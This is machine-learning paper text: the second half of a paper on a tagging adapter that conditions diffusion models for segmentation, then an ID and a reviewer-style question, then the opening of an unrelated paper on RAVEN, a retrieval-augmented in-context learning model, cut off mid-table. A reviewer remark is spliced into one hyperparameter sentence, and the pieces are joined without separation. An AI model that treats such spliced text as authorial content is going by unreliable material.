Although diffusion models are well-known for producing high-resolution images using multi-step denoising mechanisms, they are not specifically designed for dense prediction tasks. For instance, dense prediction commonly starts with a specific image rather than Gaussian noise. To adapt diffusion models for such tasks: 1) Use a VQGAN encoder (Esser et al., 2021) to extract latent image features. 2) Introduce minor noise to these features, which, in combination with textual prompts, feeds into a pre-trained denoising U-Net. 3) Capturing the U-Net’s internal features, denoted as $f_i(\epsilon_\theta, z_t, T(c))$. 4) Feed the acquired features into a task-specific decoder and compute the discrepancy between predicted outcomes and the actual ground truth: $$L = D(f_i(\epsilon_\theta, z_t, T(c)))$$ During training, one can choose to either freeze the original diffusion model parameters or fine-tune them. Empirical results suggest that the latter approach usually yields enhanced performance. Figure 2: The overall framework for our method. (a) Given an image, we first formulate image-text pair inputs. The text can be derived from one of two methods: using the full class candidates related to the datasets or employing off-the-shelf image tagging models to predict image tags. These pairs are then fed into the frozen image encoder and text encoder. (b) A set of queries is introduced to the tagging adapter with \( \times N \) attention blocks. This process can be supervised using a multi-label classification loss against the ground-truth labels. Subsequently, these queries are treated as diffusion conditions, guiding the diffusion model to procure features relevant to downstream tasks. 3.3 Condition Adapter For the diffusion model, conditioning plays a pivotal role in determining semantic content within internal features. In the generative pre-training phase, \( c_\theta \) is optimized with respect to the joint distribution of \((z_t, t, T(c))\). Here, \( z_t \) is a noisy rendition of \( z = \text{VQGAN}(x) \). Identifying the ideal textual condition \( T(c) \) for dense prediction tasks remains an area of active research. Potential strategies include: 1) Unconditional input: Using an empty text prompt. Though not optimal, it’s more favorable than resorting to irrelevant captions. 2) Off-the-shelf image caption models: Such as BLIP (Li et al., 2022b), which often overlook essential object details, leading to mediocre outcomes. 3) Training adapters for downstream tasks: Notably, the text adapter (Zhao et al., 2023) and the image-to-implicit caption adapter (Xu et al., 2023) are prevalent. The text adapter processes dataset-associated category names through a static text encoder, refined further by MLP layers: \[ T(c) = \text{TextEnc}(c) + \gamma \text{MLP}(\text{TextEnc}(c)). \] On the other hand, the image-to-implicit caption adapter generates implicit captions from static image features: \[ T(c) = \text{MLP}(\text{ImageEnc}(I)). \] 3.4 Tagging Adapter While both text and image adapters present distinct advantages, neither fully harnesses the capabilities of pre-trained weights. This limitation primarily stems from their inability to supply the diffusion model with sharp, precise information. As highlighted in Figure 1, having accurate information can markedly boost the performance of the diffusion model across diverse datasets. However, obtaining ground-truth class labels during inference remains a challenge. To address this, we introduce a tagging adapter to extract tag information. A straightforward approach involves using off-the-shelf image tagging models. Image tagging becomes particularly useful when ground-truth labels are inaccessible. This process predicts multiple labels for an image, often providing more detailed class information than other captioning models. Interestingly, our findings indicate that alignment between the label space of the image tagging model and the datasets is not mandatory. This adaptability allows for the integration of pre-trained tagging models with diverse label spaces, paving the way for zero-shot predictions on specific datasets. However, these zero-shot predictions often produce tags that can be noisy. Directly employing such noisy labels without further refinement might result in a performance drop when compared to an approach without textual conditions. To mitigate this, we propose a tagging adapter enhanced with cross-modal attention, as visualized in Figure 2. This enhanced adapter employs learnable queries to facilitate attention mechanisms across both image and text features before they are integrated into the diffusion U-Net. This can be mathematically represented by: \[ c = \{c_i \in \text{Tag}(I)\} \] \[ T(c) = \text{MLP}(Q, \text{TextEnc}(c), \text{ImageEnc}(I)) \] (6) where \( Q \) denotes the query embeddings and \( \text{Tag}(I) \) signifies the predicted tags associated with the given image \( I \). Additionally, when ground-truth category labels are accessible during training, we can integrate a multi-label classification learning objective. We start by extracting query embeddings using Equation 6. Following an average pooling applied to the resultant query embeddings, the consolidated features are directed to a multi-label classifier. The weights of the classifier are initialized from the class embeddings and remain unchanged. The predicted labels can be computed as: \[ y_k = \frac{e^{(\text{Pool}(T(c)), h_k)}}{\sum_{k=1}^{K} e^{(\text{Pool}(T(c)), h_k)}} \] (7) where \( y_k \) stands for the \( k \)-th label from the entire candidate set, and \( h_k \) represents the classifier’s \( k \)-th label weight. We adopt the asymmetric loss (Ridnik et al., 2021b) to fine-tune the tagging adapter, aligning with established practices. This loss function is perceived as conventional since the contrasting predicted query embeddings intrinsically highlight relevant specifics of the correct image classes. 4 EXPERIMENTS This section provides a comprehensive description of our experimentation, detailing the implementation process, a comparative analysis with state-of-the-art methodologies for both semantic and panoptic segmentation, and an ablation study to highlight the significance of the proposed approach. 4.1 IMPLEMENTATION DETAILS Architecture: Our core architecture utilizes the Stable-Diffusion v1.5 as the backbone. Throughout the experimental evaluations, the encoder from VQGAN (Esser et al., 2021) remains frozen while the U-Net (Ronneberger et al., 2015) is fine-tuned. We extract multi-scale features from the U-Net’s up-sampling stages, consistent with the configurations outlined in Zhao et al. (2023). These features exhibit dimensions of [1280, 1280, 640, 320] and are shaped as \([8 \times 8, 16 \times 16, 32 \times 32, 64 \times 64]\). For the image and text encoders in our adapter, we employ a frozen CLIP-L/14 (Radford et al., 2021). To maintain architectural simplicity, we utilize either SemanticFPN (Kirillov et al., 2019) or UperNet (Xiao et al., 2018) as the default decoder for semantic segmentation tasks, as will be explicitly specified in our results section. For panoptic segmentation tasks, Mask2Former (Cheng et al., 2022) serves as our decoder, with \( N = 100 \) mask predictions. By default, we use RAM (Zhang et al., 2023) as our off-and-shelf zero-shot image tagging models. HyperParameters: For the ADE20k (Zhou et al., 2019) dataset, we conduct experiments under two distinct settings: SemanticFPN for 80K iterations and UperNet for 160K iterations. The learning rates are set to \( 6 \times 10^{-5} \) for both 80K iterations and 160K iterations. The default tagging adapter’s number of queries is 32, and what is a block, it has never been mentioned before: the number of blocks is 2. For panoptic segmentation tasks, the default learning rate is \( 1 \times 10^{-4} \). The batch size is 64 and trained with 9k iterations. The multi-label classification loss weight in both experimental settings is set to one. 5 COMPARISON WITH STATE OF THE ARTS ADE20k Benchmark The ADE20k benchmark is celebrated for its comprehensive understanding of scenes, capturing a rich array of semantic details from 150 unique object and stuff categories. The | Method | Pre-train Data | Crop Size | SemanticFPN | UperNet | |------------------------|---------------|-------------|-------------|---------| | | | | mIoU +MS | mIoU +MS| | **Supervised pre-training** | | | | | | PVTv2-B2 (Wang et al., 2022) | IN-1K | 512 × 512 | 45.2 | 45.7 | | Swin-B (Liu et al., 2021) | IN-1K | 512 × 512 | 46.0 | - | | Twins-SV-T1 (Chu et al., 2021) | IN-1K | 512 × 512 | 46.7 | - | | ViT-B (Dosovitskiy et al., 2020) | IN-1K | 512 × 512 | 46.4 | 47.6 | | ConvNeXt-B (Liu et al., 2022) | IN-22K | 512 × 512 | - | 49.9 | | InternImage-B (Wang et al., 2023) | IN-1K | 512 × 512 | - | 50.8 | | Swin-L (Liu et al., 2021) | IN-22K | 640 × 640 | - | 52.1 | | RepLKNet-3Tf (Ding et al., 2022) | IN-22K | 640 × 640 | - | 52.4 | | ConvNeXt-XL (Liu et al., 2022) | IN-22K | 640 × 640 | - | 54.0 | | InternImage-XL (Wang et al., 2023) | IN-22K | 640 × 640 | - | 55.0 | | **Masked Image Modeling pre-training** | | | | | | MAE-ViT-L/16 (He et al., 2022b) | - | - | 53.6 | - | | BEiT-B (Bao et al.) | MM | 640 × 640 | - | 53.1 | | BEiT-L (Bao et al.) | MM | 640 × 640 | - | 56.7 | | **Multi-Modal pre-training** | | | | | | CLIP-ViT-B (Radford et al., 2021) | MM | 640 × 640 | 50.6 | 51.3 | | ViT-Adapter-Swin-L (Chen et al., 2022) | MM | 512 × 512 | 54.2 | 54.7 | | **Diffusion pre-training** | | | | | | VPD (Zhao et al., 2023) | LAION-2B | 512 × 512 | 53.7 | 54.6 | | Ours | LAION-2B | 512 × 512 | 55.8 | 56.9 | | Ours | LAION-2B | 640 × 640 | 56.2 | 57.2 | Table 1: ADE20K val benchmark. ’IN-1K/22K’ means ImageNet-1K/22K. MM means multi-modal pre-training. LAION-2B means the large-scale multi-modal dataset. ’+MS’ means multi-scale testing. SemanticFPN and UperNet are the different segmentation decoders. SemanticFPN is trained for 80K iterations, and UperNet is trained for 160k iterations. The dataset consists of 20k training images complemented by a 2k-image validation set. We adopted the mean intersection over union (mIoU) as our performance metric. A detailed comparison with leading models is presented in Table 1, highlighting various models distinguished by their backbones and training datasets. Default, we use both zero-shot prediction labels and multi-label classification loss. **Supervised pre-training** A dominant strategy for dense prediction tasks is supervised pre-training, including models such as InternImage-XL (Wang et al., 2023), tailored specifically for computer vision. Our method, when paired with the UperNet, achieves an increase of approximately +1.8 mIoU for single-scale testing and +2.0 mIoU for multi-scale testing. While supervised pre-training approaches exhibit robustness, they are frequently constrained by the availability of pre-trained data, given the high costs associated with acquiring supervised annotations. Our results indicate that, with right tagging adapter, large-scale pre-trained text-to-image diffusion models can potentially rival their supervised counterparts. **Masked Image pre-training and Multi-Modal pre-training** Our model was benchmarked against the MAE-ViT-L/16 (He et al., 2022b) and CLIP-ViT (Radford et al., 2021). Our method consistently outperforms the baselines. Notably, we also drew comparisons with the BEiT-L (Bao et al.) model, which is a leading competitor that first uses self-supervised multi-modal data, then fine-tuning on the ImageNet-22K (Ridnik et al., 2021a) data. Within the UpperNet setting, our approach surpassed the BEiT-L model as well. **Diffusion Pre-Training** The VPD is constructed upon the stable diffusion model v1.5. Notably, it incorporates the entire set of candidate class names when feeding input to the adapter. Using a similar SemanticFPN decoder configuration, our model achieved an increase of +2.1 mIoU under single-scale feature testing setting and an increase of +2.3 mIoU for multi-scale feature testing setting. This results highlight the importance of condition information for extracting knowledge from diffusion model. | Method | Backbone | mIoU | +MS | |-----------------|----------------|------|-----| | OCRNet | HRNet-W48 | 40.4 | 41.7| | OCRNet | HRFormer-B | - | 43.3| | SegFormer | MiT-B5 | - | 46.7| | SegNeXt | MSCAN-L | 46.5 | 47.2| | RankSeg | ViT-L | 46.7 | 47.9| | UperNet-RRT | Swin-B | 48.2 | 49.2| | Segmenter | ViT-L | 49.1 | 50.1| | UperNet | BEiT-L | 49.7 | 49.9| | VPD* | SD | 48.3 | - | | Ours | SD | 50.6 | 51.6| Table 2: COCO-stuff164k val benchmark. Ours method are trained with crop size of $640 \times 640$ and with 80k iterations. * means our implement. | Method | Backbone | Decoder | Crop Size | mIoU | |-----------------|----------------|---------------|-------------|------| | Segformer | MiT-B5 | Mask2Former | 1024*1024 | 82.4 | | Panoptic-DeepLab| SWideRNet | Mask2Former | 1024*2048 | 82.2 | | Mask2Former-T | Swin-T | Mask2Former | 512*1024 | 81.7 | | Mask2Former-L | Swin-L | Mask2Former | 512*1024 | 83.6 | | OneFormer | DiNAT-L | Mask2Former | 512*1024 | 83.1 | | VPD* | SD | SemanticFPN | 512*1024 | 81.8 | | Ours | SD | SemanticFPN | 512*1024 | 82.6 | Table 3: Cityscapes val benchmark. Our method is trained with 90k iteration2 with a lightly SemanticFPN decoder. **COCO-Stuff164k Benchmark** The COCO-Stuff164k benchmark is a challenging dataset, comprising 171 unique classes, divided into 80 “thing” categories and 91 “stuff” categories. As shown in Table 2, our approach consistently outperforms many top-tier models, such as SegFormer (Xie et al., 2021), RankSeg (He et al., 2022a), and Segmenter (Strudel et al., 2021). Notably, RankSeg utilizes a jointly-optimized multi-label classifier. The efficacy of RankSeg is closely tethered to the recall of its predictions, as omitted labels can result in a reduced decision space, potentially compromising performance. Unlike RankSeg, our model adeptly leverages predicted labels within cross-attention mechanisms, which can help mitigate the effects of inaccurately predicted labels. These experimental results confirm the effectiveness and robustness of our model in segmentation tasks. **Cityscapes Benchmark** Cityscapes focuses on intricate urban scenes and encompasses 19 unique categories. Table 3 presents a comparative analysis of our approach against other leading models in this field. Our model outperforms VPD, which is also based on the Stable Diffusion model. The results again suggest the effectiveness of the proposed model. Our model slightly lags behind Mask2Former-L, given that the latter employs a more advanced decoder compared to the SemanticFPN we use. Meanwhile, the Cityscapes dataset’s class variety is narrow, doesn’t fully utilize our tagging adapter’s potential (even in our oracle experiment in Figure 1). **COCO-Panoptic Benchmark** The COCO-Panoptic dataset is a challenging collection containing 133 classes. We compare with baselines using metrics such as panoptic quality (PQ), mIoU, and mean average precision (mAP) in Table 4. By default, we employ the Mask2Former decoder for this benchmark. Our proposed model exhibits competitive performance across the board, surpassing several established methods in this task. This indicates the robustness and effectiveness of the techniques and strategies incorporated into our model. When using the SD backbone, our method outperforms ODISE, especially in terms of PQ and mIoU. In the 100-queries setting, our method outperforms competitive models like Mask2Former and Panoptic SegFormer. 6 ABALTION STUDY To verify the effectiveness of our model design, in this section, we examine the influence of the multi-classification learning objective, the zero-shot image tagging model (RAM), the number of adapter blocks, and the weights of the classification loss. All these ablation studies are conducted on the ADE20k dataset with a fixed input resolution of $512 \times 512$. 6.1 THE COMPARISON OF DIFFERENT ADAPTERS Table 5 shows the performance of different adapters. We started with 'uncondition' input, which encodes empty semantic conditions to the diffusion U-Net. So, 53.9 could be seen the baseline performance. When solely conditioned on whole set of class labels, models like VPD offer an competitive performance. Yet, ODISE further enhances the performance by implicit captioner with CLIP$_{img}$. Furthermore, it’s intriguing to note that the performance of Tag2Text-caption is worse than the baseline model. This discrepancy might be attributed to presence of noisy or incorrect semantic condition associated with the zero-shot captioning in Tag2Text. Such noises can potentially hinder the model’s ability to accurately segment the images, underscoring the importance of reliable tagging in the zero-shot scenario. Our proposed approach, which amalgamates both CLIP$_{img}$ and CLIP$_{text}$, consistently outperforms other strategies. This highlights the complementary of image and text-based cues in semantic segmentation tasks. The integration of a multi-label learning objective in our model leads to a tangible boost in performance (from 54.8 to 55.5), signifying the efficacy of such a loss in capturing the intricate nuances of the ADE20K dataset. The addition of the RAM (zero-shot image tagging model) further augments our model’s capabilities, culminating in an mIoU of 55.8 the highest among the models under consideration. 6.2 THE INFLUENCE OF LOSS WEIGHTS AND NUMBER OF BLOCKS Table 6 and Table 7 presents a comprehensive analysis of our model’s performance under varied configurations, focusing on the influence of different blocks and the weight of the loss function. As evidenced by the left part of Table 7, varying the weightage of the loss function has a distinct impact on the model’s mIoU score. Interestingly, a weight of 5 yields the optimal mIoU of 55.72, which is marginally superior to other weight configurations. This suggests that a delicate balance is required when determining the loss weight, as both under-weighting and over-weighting can detrimentally affect the model’s segmentation capabilities. Turning our attention to the right section of Table 7, it’s evident that the number of blocks plays a pivotal role in the model’s performance. With 2 blocks, our model achieves an mIoU of 55.51, which stands as the highest among the considered configurations. However, as we increase the number of blocks, a slight decline in performance is observed. This may imply that beyond a certain point, the addition of more blocks might introduce complexity without a | Method | Backbone | PQ | AP | mIoU | |-------------------------|----------|------|------|------| | DETR Carion et al. [2020] | R50 | 43.4 | - | - | | K-Net Zhang et al. [2021b] | R50 | 47.1 | - | - | | Panoptic SegFormer Li et al. [2022c] | PVTv2-B5 | 54.1 | - | - | | MaskFormer Cheng et al. [2021] | Swin-B | 51.1 | 37.8 | 62.6 | | Mask2Former Cheng et al. [2022] | Swin-T | 53.2 | 43.3 | 63.2 | | Mask2Former | Swin-B | 55.1 | 45.2 | 65.1 | | Mask2Former(200 queries) | Swin-L | 57.8 | 48.6 | 67.4 | | FocalNet-L (200 queries) Yang et al. [2022] | Swin-L | 57.9 | 48.4 | 67.3 | | ODISE Xu et al. [2023] | SD | 55.4 | 46.0 | 65.2 | | Ours | SD | 56.1 | 46.5 | 66.5 | Table 4: COCO-Panoptic val benchmark. Our method is trained with batch size 64 and 9k iterations, which is the same with ODISE. | Method | Extra Captioner | Multi-Label Loss | mIoU | |-----------------|-----------------|------------------|------| | Uncondition | CLIP\text{text} | - | 53.9 | | Tag2Text-Caption| Tag2Text (Huang et al. 2023) | - | 53.5 | | VPD* | CLIP\text{text} | - | 54.2 | | BLIP | BLIP (Li et al. 2022b) | - | 54.2 | | ODISE* | CLIP\text{img} | - | 54.5 | | Ours | CLIP\text{img} + CLIP\text{text} | - | 54.8 | | Ours | CLIP\text{img} + CLIP\text{text} | yes | 55.5 | | Ours | CLIP\text{img} + CLIP\text{text} + RAM | yes | **55.8** | Table 5: The influence of different adapter on ADE20K; the setting is for 80K iterations. * means our implement. | Adapter | Loss weight | mIoU | |-----------------|-------------|------| | TextEnc + ImageEnc | 0 | 54.84 | | | 1 | 55.51 | | | 5 | **55.72** | | | 10 | 55.04 | | | 15 | 54.96 | Table 6: The influence of different multi-label classification loss weight on ADE20K; the setting is for 80K iterations; TE means CLIP\text{text} and IE means CLIP\text{img}. | Adapter | Blocks | mIoU | |-----------------|--------|------| | TextEnc + ImageEnc | 2 | **55.51** | | | 4 | 55.20 | | | 6 | 55.43 | | | 8 | 54.94 | | | 10 | 54.73 | Table 7: The influence of different adapter blocks on ADE20K; Adapter Block is showed in Figure 2; the setting is for 80K iterations. TextEnc means CLIP\text{text} and ImageEnc means CLIP\text{img}. A corresponding increase in representational power, potentially leading to overfitting or diminished generalization. While our model exhibits commendable performance across varied configurations, it’s essential to juxtapose these results against those of other state-of-the-art models. The consistent outperformance of our approach reiterates the robustness and versatility of our model, especially when benchmarked against models that employ different conditioning strategies or loss weightages. 7 LIMITATION Though text-to-image diffusion models demonstrate impressive capabilities in synthesizing high-quality images from textual descriptions, and hold potential for dense prediction tasks, there are inherent limitations. One primary constraint is their reliance on precise class tagging information. The accuracy of the downstream tasks are deeply tied to the clarity and correctness of textual descriptions or image class tags. Ambiguities, inaccuracies, or contextual gaps in these descriptions can substantially undermine the model’s performance. Furthermore, the model’s adaptability across a spectrum of intricate real-world scenarios is yet to be validated, leading to questions about its robustness and adaptability. 8 CONCLUSION This paper delves into the potential capability of text-to-image diffusion models for dense prediction tasks. By leveraging large-scale pre-training data, these models have showcased their ability to produce high-quality images based on varied textual descriptions. Our research indicates that with the right semantic conditions, the implicit knowledge within these models can be successfully applied to subsequent visual perception tasks. Experimental results reveal the significant role of ground-truth semantic conditions. Inspired by this observation, we propose a tagging adapter. This adapter is designed to offer robust and accurate semantic conditions, further enhanced by a multi-label classification loss function. Comprehensive evaluations across various benchmarks highlight the efficacy of the tagging adapter, demonstrating that the diffusion model can achieve superior results in visual dense prediction tasks. REFERENCES H Bao, L Dong, and F Wei. Beit: Bert pre-training of image transformers. arxiv 2021. arXiv preprint arXiv:2106.08254. Dmitry Baranchuk, Ivan Rubachev, Andrey Voynov, Valentin Khrulkov, and Artem Babenko. Label-efficient semantic segmentation with diffusion models. arXiv preprint arXiv:2112.03126, 2021. Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. Advances in neural information processing systems, 33:1877–1901, 2020. Holger Caesar, Jasper Uijlings, and Vittorio Ferrari. Coco-stuff: Thing and stuff classes in context. In Computer vision and pattern recognition (CVPR), 2018 IEEE conference on. IEEE, 2018. Nicolas Carion, Francisco Massa, Gabriel Synnaeve, Nicolas Usunier, Alexander Kirillov, and Sergey Zagoruyko. End-to-end object detection with transformers. In European conference on computer vision, pp. 213–229. Springer, 2020. Zhe Chen, Yuchen Duan, Wenhai Wang, Junjun He, Tong Lu, Jifeng Dai, and Yu Qiao. Vision transformer adapter for dense predictions. arXiv preprint arXiv:2205.08534, 2022. Bowen Cheng, Alex Schwing, and Alexander Kirillov. Per-pixel classification is not all you need for semantic segmentation. Advances in Neural Information Processing Systems, 34:17864–17875, 2021. Bowen Cheng, Ishan Misra, Alexander G Schwing, Alexander Kirillov, and Rohit Girdhar. Masked-attention mask transformer for universal image segmentation. In Proceedings of the IEEE/CVF conference on computer vision and pattern recognition, pp. 1290–1299, 2022. Aakanksha Chowdhery, Sharan Narang, Jacob Devlin, Maarten Bosma, Gaurav Mishra, Adam Roberts, Paul Barham, Hyung Won Chung, Charles Sutton, Sebastian Gehrmann, et al. Palm: Scaling language modeling with pathways. arXiv preprint arXiv:2204.02311, 2022. Xiangxiang Chu, Zhi Tian, Yuqing Wang, Bo Zhang, Haibing Ren, Xiaolin Wei, Huaxia Xia, and Chunhua Shen. Twins: Revisiting the design of spatial attention in vision transformers. Advances in Neural Information Processing Systems, 34:9355–9366, 2021. Marius Cordts, Mohamed Omran, Sebastian Ramos, Timo Rehfeld, Markus Enzweiler, Rodrigo Benenson, Uwe Franke, Stefan Roth, and Bernt Schiele. The cityscapes dataset for semantic urban scene understanding. In Proceedings of the IEEE conference on computer vision and pattern recognition, pp. 3213–3223, 2016. Jiequan Cui, Yuhui Yuan, Zhisheng Zhong, Zhuotao Tian, Han Hu, Stephen Lin, and Jiaya Jia. Region rebalance for long-tailed semantic segmentation. arXiv preprint arXiv:2204.01969, 2022. Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In 2009 IEEE conference on computer vision and pattern recognition, pp. 248–255. Ieee, 2009. Xiaohan Ding, Xiangyu Zhang, Jungong Han, and Guiguang Ding. Scaling up your kernels to 31x31: Revisiting large kernel design in cnns. In Proceedings of the IEEE/CVF conference on computer vision and pattern recognition, pp. 11963–11975, 2022. Jeff Donahue and Karen Simonyan. Large scale adversarial representation learning. Advances in neural information processing systems, 32, 2019. Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, et al. An image is worth 16x16 words: Transformers for image recognition at scale. arXiv preprint arXiv:2010.11929, 2020. Patrick Esser, Robin Rombach, and Bjorn Ommer. Taming transformers for high-resolution image synthesis. In Proceedings of the IEEE/CVF conference on computer vision and pattern recognition, pp. 12873–12883, 2021.
QXRScRrwNr
I wonder how to fairly compare ATLAS and LLM since they may not use the same datasets. (1) Saying ATLAS uses data A to perform pretraining and data B as a corpus, and LLM uses data C for pretraining, does A+B=C? If not, how to fairly compare them?
In-Context Learning with Retrieval Augmented Encoder-Decoder Language Models Anonymous authors Paper under double-blind review Abstract In this paper, we investigate the in-context learning ability of retrieval-augmented encoder-decoder language models. We first conduct a comprehensive analysis of the state-of-the-art ATLAS model and identify its limitations in in-context learning, primarily due to a mismatch between pretraining and testing, as well as a restricted context length. To address these issues, we propose RAVEN, a model that combines retrieval-augmented masked language modeling and prefix language modeling. We further introduce Fusion-in-Context Learning to enhance the few-shot performance by enabling the model to leverage more in-context examples without requiring additional training or model modifications. Through extensive experiments, we demonstrate that RAVEN significantly outperforms ATLAS and achieves results comparable to the most advanced language models in certain scenarios, despite having substantially fewer parameters. Our work underscores the potential of retrieval-augmented encoder-decoder language models for in-context learning and encourages further research in this direction. 1 Introduction Recent advancements in natural language processing have been predominantly driven by the development of large language models (LLMs) (Brown et al., 2020; OpenAI, 2022, 2023; Chowdhery et al., 2022; Smith et al., 2022). These models have demonstrated remarkable performance across a wide range of tasks (Qin et al., 2023; Bubeck et al., 2023; Huang & Chang, 2023). One of the key features that enables these models to excel is their ability to perform in-context learning (Dong et al., 2022). By conditioning on given context, LLMs can adapt to new tasks and domains without the need for task-specific fine-tuning. This enables LLMs to perform well on zero-shot or few-shot learning tasks, where only a limited number of examples are available. While in-context learning has been extensively studied for decoder-only language models like GPT-3 (Brown et al., 2020) and PaLM (Chowdhery et al., 2022), research on encoder-decoder language models, which have shown to learn stronger representations (Devlin et al., 2019; Raffel et al., 2020), remains limited. Notably, Patel et al. (2023) tap into the potential of mT5 (Xue et al., 2021), a multilingual encoder-decoder LM, by iteratively prompting the model to produce long generations with in-context examples. Chung et al. (2022); Longpre et al. (2023) finetune T5 (Raffel et al., 2020) with a large mixture of tasks using instruction tuning (Mishra et al., 2022; Wei et al., 2022; Sanh et al., 2022) to improve model performance and generalization to unseen tasks in both zero-shot and few-shot settings. On the other hand, LLMs still face challenges such as hallucination and limitations in representing the long-tail and most recent knowledge (Mallen et al., 2022; Huang et al., 2022; Luu et al., 2022; Jang et al., 2022; Zheng et al., 2023). Retrieval-augmented language models (Izacard et al., 2022b; Borgeaud et al., 2022; Wang et al., 2023; Shi et al., 2023) have emerged as a powerful approach to address these issues by retrieving relevant knowledge from an external corpus. Among these, the encoder-decoder models, such as ATLAS (Izacard et al., 2022b), stand out. They benefit from the strong representation ability of a bidirectional encoder, coupled with the efficacy of a Fusion-in-Decoder architecture (Izacard & Grave, 2021), enabling the effective integration of multiple retrieved passages. Despite these advancements, in-context learning with these models remains underexplored. 1 Code and model checkpoints will be made publicly available after the review process. In this regard, we first conduct a comprehensive analysis of the state-of-the-art retrieval-augmented encoder-decoder language model, ATLAS, by experimenting with various prompting strategies. We find that ATLAS exhibits a certain in-context learning ability; however, due to a mismatch between pretraining and testing and a limited context length—issues that are common to existing encoder-decoder LMs trained with masked language modeling—its few-shot performance is not stable and providing more than, e.g., 8-shot, examples does not lead to further improvement. Based on the analysis, we develop RAVEN\footnote{RAVEN, a bird known for its intelligence and adaptability, has the letters “RA” in its name, which represents “Retrieval-Augmented” in our context.} by first mitigating the mismatch between pretraining and testing of ATLAS through a combination of retrieval-augmented masked language modeling and prefix language modeling. Moreover, to enable the model to learn from more in-context examples, we propose Fusion-in-Context Learning, a novel approach that allows the model to utilize more in-context examples without modifying the model configuration or requiring additional training. Furthermore, we suggest using the retriever of the model to obtain relevant in-context examples to further enhance few-shot performance. Our empirical results demonstrate that RAVEN significantly outperforms ATLAS in both zero-shot and few-shot settings, even achieving comparable results to decoder-only large language models in some settings despite having 180 times fewer parameters. The main contributions of this paper are summarized as follows: • We present a comprehensive analysis of the in-context learning ability of the SOTA retrieval-augmented encoder-decoder language models and identify aspects for improvement. • Based on the analytical groundwork, we develop RAVEN by combining retrieval-augmented masked and prefix language modeling. • We further design Fusion-in-Context Learning and In-Context Example Retrieval to enhance the few-shot performance of retrieval-augmented encoder-decoder language models. • We demonstrate the effectiveness of RAVEN and the proposed methods through extensive experiments, showcasing its superiority in various settings compared to strong baselines. 2 BACKGROUND AND RELATED WORK In-Context Learning. In-context learning is one of the most significant features of LLMs (e.g., Dong et al., 2022). While there is growing interest in this area, most studies have focused on in-context learning with decoder-only LMs, e.g., GPT-3 (Brown et al., 2020). However, bidirectional LMs like BERT (Devlin et al., 2019) and T5 (Raffel et al., 2020) have been shown to achieve superior performance on various natural language understanding tasks, indicating that they may offer unique advantages for in-context learning as well. Patel et al. (2023); Chung et al. (2022) have initiated exploration into in-context learning with bidirectional LMs. While these studies have shown promising results, there is a considerable scope for further investigation. For instance, Patel et al. (2023) demonstrate that bidirectional models can outperform decoder-only LMs of a similar scale regarding in-context learning; however, there is still a significant performance gap compared to decoder-only models on a much larger scale. Retrieval-Augmented Language Models. Retrieval-augmented language models are a class of language models designed to enhance their performance by incorporating external knowledge. These models typically employ an information retrieval mechanism to access relevant information from a large corpus, which is then integrated into the model’s prediction process. Retrieval-augmented LMs can be based on both encoder-decoder (Izacard et al., 2022b; Lewis et al., 2020) and decoder-only (Khandelwal et al., 2020; Borgeaud et al., 2022; Shi et al., 2022) architectures. While there has been some research on in-context learning with retrieval-augmented decoder-only LMs, which can be straightforwardly implemented by concatenating retrieved passages with the query as the input of the LM (Mallen et al., 2022; Shi et al., 2023; Khattab et al., 2022), in-context learning with retrieval-augmented encoder-decoder LMs, such as ATLAS, remains unexplored to the best of our knowledge. Despite the fact that the encoder-decoder LMs can be more efficient at incorporating multiple (e.g., 40) retrieved passages (Izacard & Grave, 2021). In the following sections, we will start with an analysis of ATLAS and develop our model based on the analysis. 3 IN-CONTEXT LEARNING WITH ATLAS ATLAS is the state-of-the-art retrieval-augmented encoder-decoder language model, which combines a general-purpose dense retriever and a sequence-to-sequence reader with the Fusion-in-Decoder architecture. The retriever, encoder and decoder are jointly trained during the pretraining process. In this process, the dense retriever, based on the Contriever model (Izacard et al., 2022a), is responsible for selecting relevant passages from an external knowledge source, e.g., Wikipedia, based on the given corrupted context. The retrieved passages are then processed along with the context by the encoder, which generates the corresponding output, i.e., the masked spans, at the decoder (Figure 1 left). ATLAS demonstrates exceptional few-shot performance on knowledge-intensive language tasks (Petroni et al., 2021), despite having a lower parameter count compared to other recent LLMs. However, in (Izacard et al., 2022b), the few-shot performance of ATLAS is achieved by finetuning the model with few-shot examples, which requires additional training and may limit its applications, such as dealing with dynamic and diverse real-time user queries like GPT-3/4 (Brown et al., 2020; OpenAI, 2023), where in-context learning plays a vital role. Nonetheless, the in-context learning ability of ATLAS has not been investigated in the original paper. Therefore, in this section, we aim to explore the in-context learning ability of ATLAS, using open-domain question answering (Chen et al., 2017) as a representative task. 3.1 PROMPTING STRATEGIES To facilitate in-context learning, an effective prompting strategy is paramount. In contrast to decoder-only language models, where the input can only be fed to the decoder, encoder-decoder language models can take input in either the encoder or the decoder. In alignment with the pretraining objective of ATLAS, we identify two prompting strategies for in-context learning: **Strategy 1.** The first strategy involves feeding all example question-answer pairs and the target question to the encoder, without any input to the decoder. The prompt is designed as: \[ \text{Enc}: \text{Question: } q_1 \text{ Answer: } a_1 \ldots \text{ Question: } q_k \text{ Answer: } a_k \text{ Question: } q_0 \text{ Answer: } <\text{extra\_id}_0> d \] where \((q_1, a_1), \ldots, (q_k, a_k)\) represent example QA pairs, \(q_0\) denotes the target question, \(<\text{extra\_id}_0>\) is a sentinel token (Raffel et al., 2020), and \(d\) is the relevant passage retrieved with \(q_0\). An example in a 2-shot setting is illustrated in Figure 1 (middle). **Strategy 2.** As the decoder of ATLAS can also accept input, we can feed the answers of in-context examples to the decoder and only feed the questions to the encoder, using multiple sentinel tokens: \[ \text{Enc}: \text{Question: } q_1 \text{ Answer: } <\text{extra\_id}_0> \ldots \text{ Question: } q_k \text{ Answer: } <\text{extra\_id}_{(k - 1)}> \text{ Question: } q_0 \text{ Answer: } <\text{extra\_id}_k> d \] Here we present a format designed for better demonstration. The actual prompt, which follows the template used in the pretraining of ATLAS, can be found in Appendix B.3. Table 1: Results of ATLAS 11B with prompting strategy 1 (S2) and strategy 2 (S2). | | Natural Questions | TriviaQA | |----------|-------------------|----------| | | 0-shot | 1-shot | 5-shot | 8-shot | 0-shot | 1-shot | 5-shot | 8-shot | | ATLAS 